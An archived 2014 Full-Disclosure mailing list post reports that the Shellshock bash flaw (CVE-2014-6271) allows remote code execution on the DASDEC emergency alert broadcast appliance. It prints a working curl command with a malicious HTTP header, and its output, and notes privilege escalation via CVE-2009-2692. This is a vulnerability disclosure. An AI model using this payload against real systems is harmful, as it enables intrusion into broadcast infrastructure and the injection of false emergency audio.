| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <8342595e-60ea-4a75-8412-c91d3e362a9c@vt.edu>
Date: Fri, 26 Sep 2014 14:02:51 -0400
From: Matt Hazinski <mhazinsk@...edu>
To: <fulldisclosure@...lists.org>
Subject: Re: [FD] Critical bash vulnerability CVE-2014-6271
On Thu, Sep 25, 2014 at 02:39:55PM +0200, Philip Cheong wrote:
> Worse that heartbleed?
>
> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
>
> http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/
>
I'm able to get remote code execution via CVE-2014-6271 on the Digital
Alert Systems DASDEC. This appliance is used by broadcasters to send and
receive Emergency Alert System messages over IP and AFSK. Once
authenticated,
an attacker can interrupt broadcasts (via a relay) and play arbitrary audio
over the airwaves.
Exploiting it only requires a malicious HTTP header:
curl -H 'X-Shell-Shock: () { :; }; /bin/echo vulnerable >
/tmp/dumped_file'
http://192.168.0.45/dasdec/dasdec.csp
[matt@...T-EAS ~]# cat /tmp/dumped_file
vulnerable
Commands are executed as the apache user, but privilege escalation can
still
be obtained through CVE-2009-2692 despite the vendor's recent cumulative
security patch.
I suspect all versions of the DASDEC are vulnerable to this, although I
only have a DASDEC-1EN running software version 2.0-2 to test.
--
Matt Hazinski
mhazinsk@...edu
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists